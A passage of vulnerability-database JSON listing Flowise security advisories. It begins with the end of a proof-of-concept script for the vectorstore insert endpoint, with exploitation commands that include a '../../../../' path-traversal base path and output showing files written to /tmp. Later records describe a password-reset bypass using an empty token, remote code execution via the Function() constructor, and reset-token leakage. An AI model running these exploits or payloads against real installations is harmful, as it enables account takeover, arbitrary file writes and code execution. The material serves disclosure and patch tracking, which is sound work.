}\n\n    url = args.target.rstrip(\"/\") + \"/api/v1/document-store/vectorstore/insert\"\n    headers = {\"Authorization\": f\"Bearer {args.token}\"}\n\n    try:\n        status, body = post_json(url, payload, headers)\n        print(body)\n    except urllib.error.HTTPError as e:\n        print(e.read().decode())\n\nif __name__ == \"__main__\":\n    main()\n```\n\n### Setup\n\n1. 
Create a Document Store in Flowise UI\n2. Add a Document Loader (e.g., Plain Text) with any content\n3. Click \"Process\" to create chunks\n4. Note the Store ID from the URL\n5. Get your embedding credential ID from Settings → Credentials\n\n### Exploitation\n\n```bash\n# Write to /tmp\npython poc.py \\\n  --target http://127.0.0.1:3000 \\\n  --token <API_TOKEN> \\\n  --store-id <STORE_ID> \\\n  --credential <OPENAI_CREDENTIAL_ID> \\\n  --base-path /tmp/flowise-pwned\n\n# Path traversal variant\npython poc.py \\\n  --target http://127.0.0.1:3000 \\\n  --token <API_TOKEN> \\\n  --store-id <STORE_ID> \\\n  --credential <OPENAI_CREDENTIAL_ID> \\\n  --base-path \"../../../../tmp/traversal-test\"\n```\n\n### Evidence\n\n```\n$ python poc.py --target http://127.0.0.1:3000/ --token <TOKEN> --store-id 30af9716-ea51-47e6-af67-5a759a835100 --credential bb1baf6e-acb7-4ea0-b167-59a09a28108f --base-path /tmp/flowise-pwned\n\n{\"numAdded\":1,\"addedDocs\":[{\"pageContent\":\"Lorem Ipsum\",\"metadata\":{\"docId\":\"d84d9581-0778-454d-984e-42b372b1b555\"}}],\"totalChars\":0,\"totalChunks\":0,\"whereUsed\":[]}\n\n$ ls -la /tmp/flowise-pwned/\ntotal 16\ndrwxr-xr-x  4 user  wheel   128 Jan 17 12:00 .\ndrwxrwxrwt 12 root  wheel   384 Jan 17 12:00 ..\n-rw-r--r--  1 user  wheel  1234 Jan 17 12:00 docstore.json\n-rw-r--r--  1 user  wheel  5678 Jan 17 12:00 faiss.index\n```",
            "references": [
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-w6v6-49gh-mc9w",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:H/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-w6v6-49gh-mc9w"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-w6v6-49gh-mc9w",
                    "reference_id": "GHSA-w6v6-49gh-mc9w",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-w6v6-49gh-mc9w"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "GHSA-w6v6-49gh-mc9w"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v9hg-7pex-g3dp"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80704?format=api",
            "vulnerability_id": "VCID-w9yr-5jbp-q7fm",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, this vulnerability allows remote attackers to bypass authentication on affected installations of FlowiseAI Flowise. Authentication is not required to exploit this vulnerability. The specific flaw exists within the resetPassword method of the AccountService class. There is no check performed to ensure that a password reset token has actually been generated for a user account. By default the value of the reset token stored in a users account is null, or an empty string if they've reset their password before. An attacker with knowledge of the user's email address can submit a request to the \"/api/v1/account/reset-password\" endpoint containing a null or empty string reset token value and reset that user's password to a value of their choosing. This vulnerability is fixed in 3.1.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41276",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00732",
                            "scoring_system": "epss",
                            "scoring_elements": "0.73173",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41276"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41276",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41276"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-f6hc-c5jr-878p",
                    "reference_id": "GHSA-f6hc-c5jr-878p",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-f6hc-c5jr-878p"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-f6hc-c5jr-878p",
                    "reference_id": "GHSA-f6hc-c5jr-878p",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-24T14:43:03Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-f6hc-c5jr-878p"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "CVE-2026-41276",
                "GHSA-f6hc-c5jr-878p"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-w9yr-5jbp-q7fm"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/100689?format=api",
            "vulnerability_id": "VCID-wt2v-e5sa-n3g8",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5, Flowise is vulnerable to remote code execution. The CustomMCP node allows users to input configuration settings for connecting to an external MCP server. This node parses the user-provided mcpServerConfig string to build the MCP server configuration. However, during this process, it executes JavaScript code without any security validation. Specifically, inside the convertToValidJSONString function, user input is directly passed to the Function() constructor, which evaluates and executes the input as JavaScript code. Because the evaluated input runs with full Node.js runtime privileges, it can access dangerous modules such as child_process and fs. This issue has been patched in version 3.0.6; note that the fixed_packages entry of this record still marks flowise@3.0.6 as vulnerable to other advisories.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-59528",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.85265",
                            "scoring_system": "epss",
                            "scoring_elements": "0.99379",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-59528"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59528",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59528"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L132",
                    "reference_id": "CustomMCP.ts#L132",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "10.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L132"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L220",
                    "reference_id": "CustomMCP.ts#L220",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "10.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L220"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L262-L270",
                    "reference_id": "CustomMCP.ts#L262-L270",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "10.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L262-L270"
                },
                {
                    "reference_url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52440.py",
                    "reference_id": "CVE-2025-59528",
                    "reference_type": "exploit",
                    "scores": [],
                    "url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52440.py"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.6",
                    "reference_id": "flowise%403.0.6",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "10.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.6"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-3gcm-f6qx-ff7p",
                    "reference_id": "GHSA-3gcm-f6qx-ff7p",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-3gcm-f6qx-ff7p"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p",
                    "reference_id": "GHSA-3gcm-f6qx-ff7p",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "10.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/routes/node-load-methods/index.ts#L5",
                    "reference_id": "index.ts#L5",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "10.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/routes/node-load-methods/index.ts#L5"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/controllers/nodes/index.ts#L57-L78",
                    "reference_id": "index.ts#L57-L78",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "10.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/controllers/nodes/index.ts#L57-L78"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/services/nodes/index.ts#L91-L94",
                    "reference_id": "index.ts#L91-L94",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "10.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/services/nodes/index.ts#L91-L94"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/34612?format=api",
                    "purl": "pkg:npm/flowise@3.0.6",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-39aw-3gc6-bkgb"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-488c-vrqu-f7hf"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-6ufs-d346-d7ev"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-9bht-svq8-87b4"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-abyp-yn76-1yfp"
                        },
                        {
                            "vulnerability": "VCID-affy-v76q-fub6"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dtss-epth-z7fh"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-jcze-eg2c-mkcf"
                        },
                        {
                            "vulnerability": "VCID-jmps-anck-eqdt"
                        },
                        {
                            "vulnerability": "VCID-k579-xd81-hqdu"
                        },
                        {
                            "vulnerability": "VCID-ksmv-s6c9-t7ap"
                        },
                        {
                            "vulnerability": "VCID-m3j3-4u39-euht"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-qgs1-hazv-67b8"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-ywgu-76cy-uqe7"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        },
                        {
                            "vulnerability": "VCID-zwz7-byj4-6qan"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6"
                }
            ],
            "aliases": [
                "CVE-2025-59528",
                "GHSA-3gcm-f6qx-ff7p"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wt2v-e5sa-n3g8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212351?format=api",
            "vulnerability_id": "VCID-ywgu-76cy-uqe7",
            "summary": "Flowise Fails to Invalidate Existing Sessions After Password Changes",
            "references": [
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/pull/5294",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/pull/5294"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-x7rp-qj2h-ghgw",
                    "reference_id": "GHSA-x7rp-qj2h-ghgw",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-x7rp-qj2h-ghgw"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x7rp-qj2h-ghgw",
                    "reference_id": "GHSA-x7rp-qj2h-ghgw",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x7rp-qj2h-ghgw"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/35238?format=api",
                    "purl": "pkg:npm/flowise@3.0.10",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-488c-vrqu-f7hf"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-6ufs-d346-d7ev"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-9bht-svq8-87b4"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-affy-v76q-fub6"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dtss-epth-z7fh"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-jcze-eg2c-mkcf"
                        },
                        {
                            "vulnerability": "VCID-k579-xd81-hqdu"
                        },
                        {
                            "vulnerability": "VCID-ksmv-s6c9-t7ap"
                        },
                        {
                            "vulnerability": "VCID-m3j3-4u39-euht"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.10"
                }
            ],
            "aliases": [
                "GHSA-x7rp-qj2h-ghgw"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ywgu-76cy-uqe7"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/94179?format=api",
            "vulnerability_id": "VCID-zbrd-qdty-2bfs",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5 and earlier, the `forgot-password` endpoint in Flowise returns sensitive information including a valid password reset `tempToken` without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete account takeover (ATO). This vulnerability applies to both the cloud service (`cloud.flowiseai.com`) and self-hosted/local Flowise deployments that expose the same API. Commit 9e178d68873eb876073846433a596590d3d9c863 in version 3.0.6 secures password reset endpoints. Several recommended remediation steps are available. Do not return reset tokens or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel. Ensure `forgot-password` responds with a generic success message regardless of input, to avoid user enumeration. Require strong validation of the `tempToken` (e.g., single-use, short expiry, tied to request origin, validated against email delivery). Apply the same fixes to both cloud and self-hosted/local deployments. Log and monitor password reset requests for suspicious activity. Consider multi-factor verification for sensitive accounts.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-58434",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.32362",
                            "scoring_system": "epss",
                            "scoring_elements": "0.96958",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-58434"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58434",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58434"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/commit/9e178d68873eb876073846433a596590d3d9c863",
                    "reference_id": "9e178d68873eb876073846433a596590d3d9c863",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-12T18:10:37Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/commit/9e178d68873eb876073846433a596590d3d9c863"
                },
                {
                    "reference_url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/typescript/webapps/52557.py",
